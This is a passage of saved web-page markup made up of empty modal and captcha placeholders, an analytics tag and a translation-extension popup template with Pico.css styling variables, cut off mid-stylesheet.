<div class="modal fade sf-hidden" id=sendTo_message_model tabindex=-1 role=dialog aria-labelledby=exampleModalLabel>
</div>
<div class="modal fade sf-hidden" id=send_report_model role=dialog aria-labelledby=exampleModalLabel>
</div> <div class="modal fade in sf-hidden" id=payment-qrcode-modal-article-586 tabindex=-1 role aria-labelledby=exampleModalLabel aria-hidden=false>
</div>
<div style="display:none;position:fixed;top:40%;left:50%;z-index:9999;transform:translate(-50%,-50%);padding:3px 15px;border-radius:8px;background:rgba(120,120,120,0.7);box-shadow:1px 1px 3px 1px rgba(160,160,160,0.6);text-align:center;font-size:12px;color:#fff"></div><div id=windowLoading class="modal fade sf-hidden" tabindex=-1 role=dialog>
</div>
<span id=cnzz_stat_icon_1279782571></span>
<div class="geetest_panel geetest_wind" style=display:none></div><div id=immersive-translate-popup style=all:initial><template shadowrootmode=open><style class=sf-hidden>/*!
* Pico.css v1.5.6 (https://picocss.com)
* Copyright 2019-2022 - Licensed under MIT
*/#mount{--font-family:system-ui,-apple-system,"Segoe UI","Roboto","Ubuntu","Cantarell","Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--line-height:1.5;--font-weight:400;--font-size:16px;--border-radius:0.25rem;--border-width:1px;--outline-width:3px;--spacing:1rem;--typography-spacing-vertical:1.5rem;--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing);--grid-spacing-vertical:0;--grid-spacing-horizontal:var(--spacing);--form-element-spacing-vertical:0.75rem;--form-element-spacing-horizontal:1rem;--nav-element-spacing-vertical:1rem;--nav-element-spacing-horizontal:0.5rem;--nav-link-spacing-vertical:0.5rem;--nav-link-spacing-horizontal:0.5rem;--form-label-font-weight:var(--font-weight);--transition:0.2s ease-in-out;--modal-overlay-backdrop-filter:blur(0.25rem)}@media (min-width:576px){#mount{--font-size:17px}}@media (min-width:768px){#mount{--font-size:18px}}@media (min-width:992px){#mount{--font-size:19px}}@media (min-width:1200px){#mount{--font-size:20px}}@media (min-width:576px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*2.5)}}@media (min-width:768px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3)}}@media (min-width:992px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3.5)}}@media (min-width:1200px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*4)}}@media (min-width:576px){article{--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){article{--block-spacing-horizontal:calc(var(--spacing)*1.5)}}@media (min-width:992px){article{--block-spacing-horizontal:calc(var(--spacing)*1.75)}}@media (min-width:1200px){article{--block-spacing-horizontal:calc(var(--spacing)*2)}}dialog>article{--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing)}@media (min-width:576px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*2.5);--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*3);--block-spacing-horizontal:calc(var(--spacing)*1.5)}}a{--text-decoration:none}a.secondary,a.contrast{--text-decoration:underline}small{--font-size:0.875em}h1,h2,h3,h4,h5,h6{--font-weight:700}h1{--font-size:2rem;--typography-spacing-vertical:3rem}h2{--font-size:1.75rem;--typography-spacing-vertical:2.625rem}h3{--font-size:1.5rem;--typography-spacing-vertical:2.25rem}h4{--font-size:1.25rem;--typography-spacing-vertical:1.874rem}h5{--font-size:1.125rem;--typography-spacing-vertical:1.6875rem}[type="checkbox"],[type="radio"]{--border-width:2px}[type="checkbox"][role="switch"]{--border-width:3px}thead th,thead td,tfoot th,tfoot td{--border-width:3px}:not(thead,tfoot)>*>td{--font-size:0.875em}pre,code,kbd,samp{--font-family:"Menlo","Consolas","Roboto Mono","Ubuntu Monospace","Noto Mono","Oxygen Mono","Liberation Mono",monospace,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji"}kbd{--font-weight:bolder}[data-theme="light"],#mount:not([data-theme="dark"]){--background-color:#fff;--background-light-green:#F5F7F9;--color:hsl(205deg,20%,32%);--h1-color:hsl(205deg,30%,15%);--h2-color:#24333e;--h3-color:hsl(205deg,25%,23%);--h4-color:#374956;--h5-color:hsl(205deg,20%,32%);--h6-color:#4d606d;--muted-color:hsl(205deg,10%,50%);--muted-border-color:hsl(205deg,20%,94%);--primary:hsl(195deg,85%,41%);--primary-hover:hsl(195deg,90%,32%);--primary-focus:rgba(16,149,193,0.125);--primary-inverse:#fff;--secondary:hsl(205deg,15%,41%);--secondary-hover:hsl(205deg,20%,32%);--secondary-focus:rgba(89,107,120,0.125);--secondary-inverse:#fff;--contrast:hsl(205deg,30%,15%);--contrast-hover:#000;--contrast-focus:rgba(89,107,120,0.125);--contrast-inverse:#fff;--mark-background-color:#fff2ca;--mark-color:#543a26;--ins-color:#388e3c;--del-color:#c62828;--blockquote-border-color:var(--muted-border-color);--blockquote-footer-color:var(--muted-c
Reference in New Issue Copy Permalink